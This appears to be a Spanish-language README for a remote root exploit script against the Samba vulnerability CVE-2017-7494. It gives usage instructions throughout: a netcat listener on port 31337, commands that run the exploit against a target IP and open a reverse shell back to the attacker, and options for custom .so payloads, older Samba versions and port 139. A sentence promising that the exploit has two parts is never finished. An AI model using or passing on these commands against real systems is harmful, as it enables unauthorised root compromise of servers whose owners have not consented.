
Exploit remoto de root para la vulnerabilidad CVE-2017-7494 de SAMBA.
Este exploit está dividido en 2 partes:
Mientras el objetivo sea vulnerable y el payload sea el correcto para el sistema operativo y la arquitectura del objetivo, el exploit es 100 % fiable.
En tu máquina, ejecuta el siguiente comando:
$ nc -p 31337 -l
A continuación, ejecuta el exploit contra tu objetivo y espera a que se conecte de vuelta a tu Netcat:
$ python cve_2017_7494.py -t target_ip
Si cierras demasiado rápido la shell inversa, en lugar de volver a ejecutar el exploit subiendo el módulo, etc... puedes simplemente pasar la ruta al módulo que ya subió. Suponiendo que se haya subido a /shared/directory/ como "module.so", ejecutarías un comando como el siguiente:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Ahora puedes ejecutar el exploit contra samba 3.5.0 y 3.6.0, solo necesitas añadir el argumento -o 1:
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Ahora puedes usar tu propio .so personalizado:
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
En caso de que necesites ejecutar este script desde una máquina x86, compilar los binarios del implant creará dos archivos x86. Usando la bandera -n 1 puedes deshabilitar la compilación y copiar libimplantx64.so desde otra máquina.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
En caso de que samba se ejecute solo en el puerto 139, puedes configurar el puerto del servidor remoto con el argumento -p:
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Ya no doy soporte a esto.
-- Joxean Koret